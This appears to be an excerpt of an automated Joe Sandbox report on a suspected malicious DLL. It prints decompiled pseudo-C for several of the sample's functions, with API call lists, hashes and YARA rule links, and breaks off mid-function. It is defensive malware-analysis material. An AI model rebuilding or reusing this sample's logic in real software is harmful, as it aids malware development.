                    • Associated: 00000001.00000002.809405337.00000000010CC000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10c0000_loaddll32.jbxd
                    Similarity
                    • API ID: wsprintf$Heap$Free$Allocate$CountTick
                    • String ID: Ut
                    • API String ID: 1428766365-8415677
                    • Opcode ID: 675e789875287581de15535efca2f81e9b95136c58ea5e45e3537a82a2118b13
                    • Instruction ID: 32656b19a183f69e39e1bf172a7addae490520670ec267b1140af325c5aa6e7e
                    • Opcode Fuzzy Hash: 675e789875287581de15535efca2f81e9b95136c58ea5e45e3537a82a2118b13
                    • Instruction Fuzzy Hash: C4314C76A00119EFCB11DFA8D888EDE3BADFB08751F10801AF981D7240EB769554DFA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 010C1000 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 29sleepmemoryCOMMON
                    Download Yara Rule
                    C-Code - Quality: 50%
                    			E010C1000(void** __esi) {
				intOrPtr _v0;
				intOrPtr _t4;
				intOrPtr _t6;
				void* _t8;
				void* _t9;
				intOrPtr _t10;
				void* _t11;
				void** _t13;

				_t13 = __esi;
				_t4 =  *0x10ca3cc; // 0x37a95b0
				__imp__(_t4 + 0x40);
				while(1) {
					_t6 =  *0x10ca3cc; // 0x37a95b0
					_t1 = _t6 + 0x58; // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t8 =  *_t13;
				if(_t8 != 0 && _t8 != 0x10ca030) {
					HeapFree( *0x10ca2d8, 0, _t8);
				}
				_t9 = E010C3B61(_v0, _t13); // executed
				_t13[1] = _t9;
				_t10 =  *0x10ca3cc; // 0x37a95b0
				_t11 = _t10 + 0x40;
				__imp__(_t11);
				return _t11;
			}











                    0x010c1000
                    0x010c1000
                    0x010c1009
                    0x010c1019
                    0x010c1019
                    0x010c101e
                    0x010c1023
                    0x00000000
                    0x00000000
                    0x010c1013
                    0x010c1013
                    0x010c1025
                    0x010c1029
                    0x010c103b
                    0x010c103b
                    0x010c1046
                    0x010c104b
                    0x010c104e
                    0x010c1053
                    0x010c1057
                    0x010c105d

                    APIs
                    • RtlEnterCriticalSection.NTDLL(037A9570), ref: 010C1009
                    • Sleep.KERNEL32(0000000A), ref: 010C1013
                    • HeapFree.KERNEL32(00000000,00000000), ref: 010C103B
                    • RtlLeaveCriticalSection.NTDLL(037A9570), ref: 010C1057
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.809343460.00000000010C1000.00000020.00020000.sdmp, Offset: 010C0000, based on PE: true
                    • Associated: 00000001.00000002.809327641.00000000010C0000.00000004.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809376186.00000000010C9000.00000002.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809388376.00000000010CA000.00000004.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809405337.00000000010CC000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10c0000_loaddll32.jbxd
                    Similarity
                    • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                    • String ID: Ut
                    • API String ID: 58946197-8415677
                    • Opcode ID: b9f7be640d3b90ce6ebee966d2565b9277d7fc96b796a93f9a1aae2e3c59e8f9
                    • Instruction ID: 4dd88307fa287eca1e90ee0feb358d83db598c5841029d09b282bb7f13bbd1f9
                    • Opcode Fuzzy Hash: b9f7be640d3b90ce6ebee966d2565b9277d7fc96b796a93f9a1aae2e3c59e8f9
                    • Instruction Fuzzy Hash: 8BF03A70300241EFEB309B6CDC48B0A3BA4AB40B48B208008F5C1D7196D27AE840DF24
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 010C6535 Relevance: 7.7, APIs: 5, Instructions: 159memoryCOMMON
                    Download Yara Rule
                    C-Code - Quality: 57%
                    			E010C6535(signed int __edx) {
				signed int _v8;
				long _v12;
				CHAR* _v16;
				long _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t21;
				CHAR* _t22;
				CHAR* _t25;
				intOrPtr _t26;
				void* _t27;
				void* _t31;
				void* _t32;
				CHAR* _t36;
				CHAR* _t42;
				CHAR* _t43;
				CHAR* _t44;
				void* _t49;
				void* _t51;
				signed char _t56;
				intOrPtr _t58;
				signed int _t59;
				void* _t63;
				CHAR* _t67;
				CHAR* _t68;
				char* _t69;
				void* _t70;

				_t61 = __edx;
				_v20 = 0;
				_v8 = 0;
				_v12 = 0;
				_t21 = E010C4843();
				if(_t21 != 0) {
					_t59 =  *0x10ca2fc; // 0x2000000a
					_t55 = (_t59 & 0xf0000000) + _t21;
					 *0x10ca2fc = (_t59 & 0xf0000000) + _t21;
				}
				_t22 =  *0x10ca178(0, 2); // executed
				_v16 = _t22;
				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
					_t25 = E010C1649( &_v8,  &_v20); // executed
					_t54 = _t25;
					_t26 =  *0x10ca320; // 0x26dd5a8
					if( *0x10ca2fc > 5) {
						_t8 = _t26 + 0x10cb5cd; // 0x4d283a53
						_t27 = _t8;
					} else {
						_t7 = _t26 + 0x10cb9f5; // 0x44283a44
						_t27 = _t7;
					}
					E010C5A2D(_t27, _t27);
					_t31 = E010C414A(_t61,  &_v20,  &_v12); // executed
					if(_t31 == 0) {
						CloseHandle(_v20);
					}
					_t63 = 5;
					if(_t54 != _t63) {
						 *0x10ca310 =  *0x10ca310 ^ 0x81bbe65d;
						_t32 = E010C63FD(0x60);
						__eflags = _t32;
						 *0x10ca3cc = _t32;
						if(_t32 == 0) {
							_push(8);
							_pop(0);
						} else {
							memset(_t32, 0, 0x60);
							_t49 =  *0x10ca3cc; // 0x37a95b0
							_t70 = _t70 + 0xc;
							__imp__(_t49 + 0x40);
							_t51 =  *0x10ca3cc; // 0x37a95b0
							 *_t51 = 0x10cb81a;
						}
						__eflags = 0;
						_t54 = 0;
						if(0 == 0) {
							_t36 = RtlAllocateHeap( *0x10ca2d8, 0, 0x43);
							__eflags = _t36;
							 *0x10ca364 = _t36;
							if(_t36 == 0) {
								_push(8);
								_pop(0);
							} else {
								_t56 =  *0x10ca2fc; // 0x2000000a
								_t61 = _t56 & 0x000000ff;
								_t58 =  *0x10ca320; // 0x26dd5a8
								_t13 = _t58 + 0x10cb55a; // 0x697a6f4d
								_t55 = _t13;
								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0x10c9287);
							}
							__eflags = 0;
							_t54 = 0;
							if(0 == 0) {
								asm("sbb eax, eax");
								E010C21BC( ~_v8 &  *0x10ca310, 0x10ca00c); // executed
								_t42 = E010C4EF3(0, _t55, _t63, 0x10ca00c); // executed
								_t54 = _t42;
								__eflags = _t54;
								if(_t54 != 0) {
									goto L30;
								}
								_t43 = E010C3C10(); // executed
								__eflags = _t43;
								if(_t43 != 0) {
									__eflags = _v8;
									_t67 = _v12;
									if(_v8 != 0) {
										L29:
										_t44 = E010C5458(_t61, _t67, _v8); // executed
										_t54 = _t44;
										goto L30;
									}
									__eflags = _t67;
									if(__eflags == 0) {
										goto L30;
									}
									_t54 = E010C7576(__eflags,  &(_t67[4]));
									__eflags = _t54;
									if(_t54 == 0) {
										goto L30;
									}
									goto L29;
								}
								_t54 = 8;
							}
						}
					} else {
						_t68 = _v12;
						if(_t68 == 0) {
							L30:
							if(_v16 == 0 || _v16 == 1) {
								 *0x10ca17c();
							}
							goto L34;
						}
						_t69 =  &(_t68[4]);
						do {
						} while (E010C78DB(_t63, _t69, 0, 1) == 0x4c7);
					}
					goto L30;
				} else {
					_t54 = _t22;
					L34:
					return _t54;
				}
			}































                    0x010c6535
                    0x010c653f
                    0x010c6542
                    0x010c6545
                    0x010c6548
                    0x010c654f
                    0x010c6551
                    0x010c655d
                    0x010c655f
                    0x010c655f
                    0x010c6568
                    0x010c6570
                    0x010c6573
                    0x010c658d
                    0x010c6599
                    0x010c659b
                    0x010c65a0
                    0x010c65aa
                    0x010c65aa
                    0x010c65a2
                    0x010c65a2
                    0x010c65a2
                    0x010c65a2
                    0x010c65b1
                    0x010c65be
                    0x010c65c5
                    0x010c65ca
                    0x010c65ca
                    0x010c65d3
                    0x010c65d6
                    0x010c65fc
                    0x010c6608
                    0x010c660d
                    0x010c660f
                    0x010c6614
                    0x010c6640
                    0x010c6642
                    0x010c6616
                    0x010c661a
                    0x010c661f
                    0x010c6624
                    0x010c662b
                    0x010c6631
                    0x010c6636
                    0x010c663c
                    0x010c6643
                    0x010c6645
                    0x010c6647
                    0x010c6656
                    0x010c665c
                    0x010c665e
                    0x010c6663
                    0x010c6693
                    0x010c6695
                    0x010c6665
                    0x010c6665
                    0x010c666b
                    0x010c6678
                    0x010c667e
                    0x010c667e
                    0x010c6686
                    0x010c668f
                    0x010c6696
                    0x010c6698
                    0x010c669a
                    0x010c66a1
                    0x010c66ae
                    0x010c66b3
                    0x010c66b8
                    0x010c66ba
                    0x010c66bc
                    0x00000000
                    0x00000000
                    0x010c66be
                    0x010c66c3
                    0x010c66c5
                    0x010c66cc
                    0x010c66d0
                    0x010c66d3
                    0x010c66e8
                    0x010c66ec
                    0x010c66f1
                    0x00000000
                    0x010c66f1
                    0x010c66d5
                    0x010c66d7
                    0x00000000
                    0x00000000
                    0x010c66e2
                    0x010c66e4
                    0x010c66e6
                    0x00000000
                    0x00000000
                    0x00000000
                    0x010c66e6
                    0x010c66c9
                    0x010c66c9
                    0x010c669a
                    0x010c65d8
                    0x010c65d8
                    0x010c65dd
                    0x010c66f3
                    0x010c66f8
                    0x010c6700
                    0x010c6700
                    0x00000000
                    0x010c66f8
                    0x010c65e3
                    0x010c65e6
                    0x010c65f0
                    0x010c65f7
                    0x00000000
                    0x010c6708
                    0x010c6708
                    0x010c670b
                    0x010c670f
                    0x010c670f

                    APIs
                      • Part of subcall function 010C4843: GetModuleHandleA.KERNEL32(4C44544E,00000000,010C654D,00000001), ref: 010C4852
                    • CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 010C65CA
                      • Part of subcall function 010C63FD: RtlAllocateHeap.NTDLL(00000000,00000000,010C28D5), ref: 010C6409
                    • memset.NTDLL ref: 010C661A
                    • RtlInitializeCriticalSection.NTDLL(037A9570), ref: 010C662B
                      • Part of subcall function 010C7576: memset.NTDLL ref: 010C7590
                      • Part of subcall function 010C7576: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 010C75D6
                      • Part of subcall function 010C7576: StrCmpNIW.SHLWAPI(00000000,?,00000000), ref: 010C75E1
                    • RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 010C6656
                    • wsprintfA.USER32 ref: 010C6686
                    Memory Dump Source
                    • Source File: 00000001.00000002.809343460.00000000010C1000.00000020.00020000.sdmp, Offset: 010C0000, based on PE: true
                    • Associated: 00000001.00000002.809327641.00000000010C0000.00000004.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809376186.00000000010C9000.00000002.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809388376.00000000010CA000.00000004.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809405337.00000000010CC000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10c0000_loaddll32.jbxd
                    Similarity
                    • API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
                    • String ID:
                    • API String ID: 4246211962-0
                    • Opcode ID: 63053eafa789ceb971e9f360c654ec9c4a95415f4fb82bfbbfd050e02e62e896
                    • Instruction ID: 5c2604e3407da87b862b7c7b14ab773ee82410aaf0fc0323d524dd1f143ef5a5
                    • Opcode Fuzzy Hash: 63053eafa789ceb971e9f360c654ec9c4a95415f4fb82bfbbfd050e02e62e896
                    • Instruction Fuzzy Hash: 7651D471B0022ADFDB719BE8DC44BAE37E8BB18F44F10446DE6C1E7245E6BA95448F90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 010C37CE Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 145stringCOMMON
                    Download Yara Rule
                    C-Code - Quality: 22%
                    			E010C37CE(signed int __eax, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				intOrPtr _t81;
				char _t83;
				signed int _t90;
				signed int _t97;
				signed int _t99;
				char _t101;
				unsigned int _t102;
				intOrPtr _t103;
				char* _t107;
				signed int _t110;
				signed int _t113;
				signed int _t118;
				signed int _t122;
				intOrPtr _t124;

				_t102 = _a8;
				_t118 = 0;
				_v20 = __eax;
				_t122 = (_t102 >> 2) + 1;
				_v8 = 0;
				_a8 = 0;
				_t81 = E010C63FD(_t122 << 2);
				_v16 = _t81;
				if(_t81 == 0) {
					_push(8);
					_pop(0);
					L37:
					return 0;
				}
				_t107 = _a4;
				_a4 = _t102;
				_t113 = 0;
				while(1) {
					_t83 =  *_t107;
					if(_t83 == 0) {
						break;
					}
					if(_t83 == 0xd || _t83 == 0xa) {
						if(_t118 != 0) {
							if(_t118 > _v8) {
								_v8 = _t118;
							}
							_a8 = _a8 + 1;
							_t118 = 0;
						}
						 *_t107 = 0;
						goto L16;
					} else {
						if(_t118 != 0) {
							L10:
							_t118 = _t118 + 1;
							L16:
							_t107 = _t107 + 1;
							_t15 =  &_a4;
							 *_t15 = _a4 - 1;
							if( *_t15 != 0) {
								continue;
							}
							break;
						}
						if(_t113 == _t122) {
							L21:
							if(_a8 <= 0x20) {
								_push(0xb);
								L34:
								_pop(0);
								L35:
								E010C17AB(_v16);
								goto L37;
							}
							_t24 = _v8 + 5; // 0xcdd8d2f8
							_t103 = E010C63FD((_v8 + _t24) * _a8 + 4);
							if(_t103 == 0) {
								_push(8);
								goto L34;
							}
							_t90 = _a8;
							_a4 = _a4 & 0x00000000;
							_v8 = _v8 & 0x00000000;
							_t124 = _t103 + _t90 * 4;
							if(_t90 <= 0) {
								L31:
								 *0x10ca318 = _t103;
								goto L35;
							}
							do {
								_t110 = 0x3c6ef35f + _v20 * 0x19660d;
								_v20 = 0x3c6ef35f + _t110 * 0x19660d;
								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));
								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));
								_v12 = _v12 & 0x00000000;
								if(_a4 <= 0) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t99 = _v12;
									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124); // executed
									if(_t99 == 0) {
										break;
									}
									_v12 = _v12 + 1;
									if(_v12 < _a4) {
										continue;
									}
									goto L30;
								}
								_v8 = _v8 - 1;
								L30:
								_t97 = _a4;
								_a4 = _a4 + 1;
								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
								__imp__(_t124);
								_v8 = _v8 + 1;
								_t124 = _t124 + _t97 + 1;
							} while (_v8 < _a8);
							goto L31;
						}
						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
						_t101 = _t83;
						if(_t83 - 0x61 <= 0x19) {
							_t101 = _t101 - 0x20;
						}
						 *_t107 = _t101;
						_t113 = _t113 + 1;
						goto L10;
					}
				}
				if(_t118 != 0) {
					if(_t118 > _v8) {
						_v8 = _t118;
					}
					_a8 = _a8 + 1;
				}
				goto L21;
			}





















                    0x010c37d5
                    0x010c37dc
                    0x010c37e1
                    0x010c37e4
                    0x010c37eb
                    0x010c37ee
                    0x010c37f1
                    0x010c37f8
                    0x010c37fb
                    0x010c394f
                    0x010c3951
                    0x010c3953
                    0x010c3958
                    0x010c3958
                    0x010c3801
                    0x010c3804
                    0x010c3807
                    0x010c3809
                    0x010c3809
                    0x010c380d
                    0x00000000
                    0x00000000
                    0x010c3811
                    0x010c383d
                    0x010c3842
                    0x010c3844
                    0x010c3844
                    0x010c3847
                    0x010c384a
                    0x010c384a
                    0x010c384c
                    0x00000000
                    0x010c3817
                    0x010c3819
                    0x010c3838
                    0x010c3838
                    0x010c384f
                    0x010c384f
                    0x010c3850
                    0x010c3850
                    0x010c3853
                    0x00000000
                    0x00000000
                    0x00000000
                    0x010c3853
                    0x010c381d
                    0x010c3864
                    0x010c3868
                    0x010c3942
                    0x010c3944
                    0x010c3944
                    0x010c3945
                    0x010c3948
                    0x00000000
                    0x010c3948
                    0x010c3871
                    0x010c3882
                    0x010c3886
                    0x010c393e
                    0x00000000
                    0x010c393e
                    0x010c388c
                    0x010c388f
                    0x010c3893
                    0x010c3899
                    0x010c389c
                    0x010c3934
                    0x010c3934
                    0x00000000
                    0x010c393a
                    0x010c38a7
                    0x010c38b0
                    0x010c38c4
                    0x010c38cb
                    0x010c38e0
                    0x010c38e6
                    0x010c38ee
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x010c38f0
                    0x010c38f0
                    0x010c38f0
                    0x010c38f7
                    0x010c38ff
                    0x00000000
                    0x00000000
                    0x010c3901
                    0x010c390a
                    0x00000000
                    0x00000000
                    0x00000000
                    0x010c390c
                    0x010c390e
                    0x010c3911
                    0x010c3911
                    0x010c3914
                    0x010c3918
                    0x010c391b
                    0x010c3921
                    0x010c3924
                    0x010c392b
                    0x00000000
                    0x010c38a7
                    0x010c3822
                    0x010c382d
                    0x010c3830
                    0x010c3832
                    0x010c3832
                    0x010c3835
                    0x010c3837
                    0x00000000
                    0x010c3837
                    0x010c3811
                    0x010c3857
                    0x010c385c
                    0x010c385e
                    0x010c385e
                    0x010c3861
                    0x010c3861
                    0x00000000

                    APIs
                      • Part of subcall function 010C63FD: RtlAllocateHeap.NTDLL(00000000,00000000,010C28D5), ref: 010C6409
                    • lstrcpy.KERNEL32(69B25F45,00000020), ref: 010C38CB
                    • lstrcat.KERNEL32(69B25F45,00000020), ref: 010C38E0
                    • lstrcmp.KERNEL32(00000000,69B25F45), ref: 010C38F7
                    • lstrlen.KERNEL32(69B25F45), ref: 010C391B
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.809343460.00000000010C1000.00000020.00020000.sdmp, Offset: 010C0000, based on PE: true
                    • Associated: 00000001.00000002.809327641.00000000010C0000.00000004.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809376186.00000000010C9000.00000002.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809388376.00000000010CA000.00000004.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809405337.00000000010CC000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10c0000_loaddll32.jbxd
                    Similarity
                    • API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
                    • String ID:
                    • API String ID: 3214092121-3916222277
                    • Opcode ID: 26fd51c2c7dec851fdb8dfcf9aca704a98dd9307f2ea6f351646247e0591e9c7
                    • Instruction ID: ce03c8fe8f2a9e6f21841cfb5147b15879428f22043feb756a057a61893713f2
                    • Opcode Fuzzy Hash: 26fd51c2c7dec851fdb8dfcf9aca704a98dd9307f2ea6f351646247e0591e9c7
                    • Instruction Fuzzy Hash: EE518931A10208EFDB61CF99C4846EEBBB6FF45B14F15C09AE995AF211C731AA45CF81
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 010C3399 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 94memoryCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E010C3399(void* __edx) {
				void* _v8;
				int _v12;
				WCHAR* _v16;
				void* __edi;
				void* __esi;
				void* _t23;
				intOrPtr _t24;
				void* _t26;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t38;
				intOrPtr _t42;
				void* _t45;
				void* _t50;
				void* _t52;

				_t50 = __edx;
				_v12 = 0;
				_t23 = E010C40C7(0,  &_v8); // executed
				if(_t23 != 0) {
					_v8 = 0;
				}
				_t24 =  *0x10ca320; // 0x26dd5a8
				_t4 = _t24 + 0x10cbe30; // 0x37a93d8
				_t5 = _t24 + 0x10cbdd8; // 0x4f0053
				_t26 = E010C2985( &_v16, _v8, _t5, _t4); // executed
				_t45 = _t26;
				if(_t45 == 0) {
					StrToIntExW(_v16, 0,  &_v12);
					_t45 = 8;
					if(_v12 < _t45) {
						_t45 = 1;
						__eflags = 1;
					} else {
						_t32 =  *0x10ca320; // 0x26dd5a8
						_t11 = _t32 + 0x10cbe24; // 0x37a93cc
						_t48 = _t11;
						_t12 = _t32 + 0x10cbdd8; // 0x4f0053
						_t52 = E010C114D(_t11, _t12, _t11);
						_t59 = _t52;
						if(_t52 != 0) {
							_t35 =  *0x10ca320; // 0x26dd5a8
							_t13 = _t35 + 0x10cbe6e; // 0x30314549
							if(E010C5231(_t48, _t50, _t59, _v8, _t52, _t13, 0x14) == 0) {
								_t61 =  *0x10ca2fc - 6;
								if( *0x10ca2fc <= 6) {
									_t42 =  *0x10ca320; // 0x26dd5a8
									_t15 = _t42 + 0x10cbdba; // 0x52384549
									E010C5231(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
								}
							}
							_t38 =  *0x10ca320; // 0x26dd5a8
							_t17 = _t38 + 0x10cbe68; // 0x37a9410
							_t18 = _t38 + 0x10cbe40; // 0x680043
							_t45 = E010C34EE(_v8, 0x80000001, _t52, _t18, _t17);
							HeapFree( *0x10ca2d8, 0, _t52);
						}
					}
					HeapFree( *0x10ca2d8, 0, _v16);
				}
				_t54 = _v8;
				if(_v8 != 0) {
					E010C4B59(_t54);
				}
				return _t45;
			}


















                    0x010c3399
                    0x010c33a9
                    0x010c33ac
                    0x010c33b3
                    0x010c33b5
                    0x010c33b5
                    0x010c33b8
                    0x010c33bd
                    0x010c33c4
                    0x010c33d1
                    0x010c33d6
                    0x010c33da
                    0x010c33e8
                    0x010c33f6
                    0x010c33fa
                    0x010c348b
                    0x010c348b
                    0x010c3400
                    0x010c3400
                    0x010c3405
                    0x010c3405
                    0x010c340c
                    0x010c3418
                    0x010c341a
                    0x010c341c
                    0x010c341e
                    0x010c3425
                    0x010c3437
                    0x010c3439
                    0x010c3440
                    0x010c3442
                    0x010c3449
                    0x010c3454
                    0x010c3454
                    0x010c3440
                    0x010c3459
                    0x010c345e
                    0x010c3465
                    0x010c3483
                    0x010c3485
                    0x010c3485
                    0x010c341c
                    0x010c3497
                    0x010c3497
                    0x010c3499
                    0x010c349e
                    0x010c34a0
                    0x010c34a0
                    0x010c34ab

                    APIs
                    • StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,037A93D8,00000000,?,74E5F710,00000000,74E5F730), ref: 010C33E8
                    • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,037A9410,?,00000000,30314549,00000014,004F0053,037A93CC), ref: 010C3485
                    • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,010C54F9), ref: 010C3497
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.809343460.00000000010C1000.00000020.00020000.sdmp, Offset: 010C0000, based on PE: true
                    • Associated: 00000001.00000002.809327641.00000000010C0000.00000004.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809376186.00000000010C9000.00000002.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809388376.00000000010CA000.00000004.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809405337.00000000010CC000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10c0000_loaddll32.jbxd
                    Similarity
                    • API ID: FreeHeap
                    • String ID: Ut
                    • API String ID: 3298025750-8415677
                    • Opcode ID: 61da6dd65155f00957a7771256adec257fd9b95459cead9c9784673f2c8d43c7
                    • Instruction ID: 967db544eb9a1152dbf989f3b06c7c2d2a6ec95c13b743237124971ccd905ea9
                    • Opcode Fuzzy Hash: 61da6dd65155f00957a7771256adec257fd9b95459cead9c9784673f2c8d43c7
                    • Instruction Fuzzy Hash: 0131B435A10119FFDB229F94DC44EDEBBBDFB09B40F1441A9B680EB051DA756908CF50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 010C14E4 Relevance: 6.1, APIs: 4, Instructions: 98memoryCOMMON
                    Download Yara Rule
                    APIs
                    • SysAllocString.OLEAUT32(80000002), ref: 010C153B
                    • SysAllocString.OLEAUT32(010C2BCC), ref: 010C157E
                    • SysFreeString.OLEAUT32(00000000), ref: 010C1592
                    • SysFreeString.OLEAUT32(00000000), ref: 010C15A0
                    Memory Dump Source
                    • Source File: 00000001.00000002.809343460.00000000010C1000.00000020.00020000.sdmp, Offset: 010C0000, based on PE: true
                    • Associated: 00000001.00000002.809327641.00000000010C0000.00000004.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809376186.00000000010C9000.00000002.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809388376.00000000010CA000.00000004.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809405337.00000000010CC000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10c0000_loaddll32.jbxd
                    Similarity
                    • API ID: String$AllocFree
                    • String ID:
                    • API String ID: 344208780-0
                    • Opcode ID: 72aa8ef5162805ce3d7b9ea52968e00a0a2e043e51807afea22571287bd3a177
                    • Instruction ID: 8200d3b0e832d6faf6beda49d2aa87c76bd3664b7fa2de70da81bc50c4257943
                    • Opcode Fuzzy Hash: 72aa8ef5162805ce3d7b9ea52968e00a0a2e043e51807afea22571287bd3a177
                    • Instruction Fuzzy Hash: 22315BB2900209EFCB11DF98D4808EE7BF9FF58340B14816EF94A97251E7359A45CF61
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 010C57A8 Relevance: 6.1, APIs: 4, Instructions: 76sleepstringCOMMON
                    Download Yara Rule
                    C-Code - Quality: 78%
                    			E010C57A8(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t26;
				intOrPtr* _t28;
				intOrPtr _t31;
				intOrPtr* _t32;
				void* _t39;
				int _t46;
				intOrPtr* _t47;
				int _t48;

				_t47 = __eax;
				_push( &_v12);
				_push(__eax);
				_t39 = 0;
				_t46 = 0; // executed
				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
				_v8 = _t26;
				if(_t26 < 0) {
					L13:
					return _v8;
				}
				if(_v12 == 0) {
					Sleep(0xc8);
					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
				}
				if(_v8 >= _t39) {
					_t28 = _v12;
					if(_t28 != 0) {
						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
						_v8 = _t31;
						if(_t31 >= 0) {
							_t46 = lstrlenW(_v16);
							if(_t46 != 0) {
								_t46 = _t46 + 1;
								_t48 = _t46 + _t46;
								_t39 = E010C63FD(_t48);
								if(_t39 == 0) {
									_v8 = 0x8007000e;
								} else {
									memcpy(_t39, _v16, _t48);
								}
								__imp__#6(_v16);
							}
						}
						_t32 = _v12;
						 *((intOrPtr*)( *_t32 + 8))(_t32);
					}
					 *_a4 = _t39;
					 *_a8 = _t46 + _t46;
				}
				goto L13;
			}














                    0x010c57b4
                    0x010c57b8
                    0x010c57b9
                    0x010c57ba
                    0x010c57bc
                    0x010c57be
                    0x010c57c3
                    0x010c57c6
                    0x010c585d
                    0x010c5864
                    0x010c5864
                    0x010c57cf
                    0x010c57d6
                    0x010c57e6
                    0x010c57e6
                    0x010c57ec
                    0x010c57ee
                    0x010c57f3
                    0x010c57fc
                    0x010c5804
                    0x010c5807
                    0x010c5812
                    0x010c5816
                    0x010c5818
                    0x010c5819
                    0x010c5822
                    0x010c5826
                    0x010c5837
                    0x010c5828
                    0x010c582d
                    0x010c5832
                    0x010c5841
                    0x010c5841
                    0x010c5816
                    0x010c5847
                    0x010c584d
                    0x010c584d
                    0x010c5856
                    0x010c585b
                    0x010c585b
                    0x00000000

                    APIs
                    Memory Dump Source
                    • Source File: 00000001.00000002.809343460.00000000010C1000.00000020.00020000.sdmp, Offset: 010C0000, based on PE: true
                    • Associated: 00000001.00000002.809327641.00000000010C0000.00000004.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809376186.00000000010C9000.00000002.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809388376.00000000010CA000.00000004.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809405337.00000000010CC000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10c0000_loaddll32.jbxd
                    Similarity
                    • API ID: FreeSleepStringlstrlenmemcpy
                    • String ID:
                    • API String ID: 1198164300-0
                    • Opcode ID: 88afbf0d502e7b1a178af19708d0e54072c3303516023d8f902f259a125bb5d6
                    • Instruction ID: 8385f893472de9480bc334ff0ecd14f47a9c218ef1b2b64bf28c783c730c1766
                    • Opcode Fuzzy Hash: 88afbf0d502e7b1a178af19708d0e54072c3303516023d8f902f259a125bb5d6
                    • Instruction Fuzzy Hash: 91215179A00209EFDB11DFA8C8849DEBBB4FF48700B1041ADE995E7210E731AA05CF50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 010C2A4C Relevance: 6.0, APIs: 4, Instructions: 44sleepthreadtimeCOMMON
                    Download Yara Rule
                    C-Code - Quality: 65%
                    			E010C2A4C(void* __ecx, intOrPtr _a4) {
				struct _FILETIME _v12;
				int _t13;
				signed int _t16;
				void* _t18;
				signed int _t19;
				unsigned int _t23;
				void* _t30;
				signed int _t34;

				_v12.dwLowDateTime = _v12.dwLowDateTime & 0x00000000;
				asm("stosd");
				do {
					_t13 = SwitchToThread();
					GetSystemTimeAsFileTime( &_v12);
					_t23 = _v12.dwHighDateTime;
					_t16 = (_t23 << 0x00000020 | _v12.dwLowDateTime) >> 5;
					_push(0);
					_push(0x13);
					_push(_t23 >> 5);
					_push(_t16);
